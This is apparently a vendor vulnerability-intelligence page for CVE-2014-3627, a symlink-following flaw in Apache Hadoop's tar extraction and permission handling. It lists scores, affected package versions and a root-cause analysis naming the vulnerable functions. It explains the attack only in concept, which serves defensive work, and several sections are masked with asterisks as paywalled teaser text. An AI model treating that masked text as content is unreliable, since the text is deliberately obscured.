Miggo Logo

CVE-2014-3627: Improper Link Resolution Before File Access in Apache Hadoop

5

CVSS Score

Basic Information

EPSS Score
0.82804%
Published
5/17/2022
Updated
1/27/2023
KEV Status
No
Technology
TechnologyJava

Technical Details

CVSS Vector
AV:N/AC:L/Au:N/C:P/I:N/A:N
Package NameEcosystemVulnerable VersionsFirst Patched Version
org.apache.hadoop:hadoop-clientmaven>= 0.23.0, < 1.0.11.0.1
org.apache.hadoop:hadoop-clientmaven>= 2.0.0, < 2.5.22.5.2

Vulnerability Intelligence
Miggo AIMiggo AI

Miggo AIRoot Cause Analysis

The vulnerability stems from two key phases: 1) Improper extraction of tar archives allowing symlink creation, and 2) Permission modification operations that follow these symlinks. The FileUtil.unTar function is directly responsible for the first phase by processing archive entries without symlink validation. The LocalizedResource.fixPermissions handles the second phase by applying permissions without NOFOLLOW checks. Both functions would appear in stack traces during exploitation - unTar when processing the malicious archive, and fixPermissions when modifying permissions of symlink targets.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

T** Y*RN No**M*n***r ***mon in *p**** ***oop *.**.* t*rou** *.**.** *n* *.x ***or* *.*.*, w**n usin* K*r**ros *ut**nti**tion, *llows r*mot* *lust*r us*rs to ***n** t** p*rmissions o* **rt*in *il*s to worl*-r*****l* vi* * symlink *tt**k in * pu*li* t*

Reasoning

T** vuln*r**ility st*ms *rom two k*y p**s*s: *) Improp*r *xtr**tion o* t*r *r**iv*s *llowin* symlink *r**tion, *n* *) P*rmission mo*i*i**tion op*r*tions t**t *ollow t**s* symlinks. T** `*il*Util.unT*r` *un*tion is *ir**tly r*sponsi*l* *or t** *irst p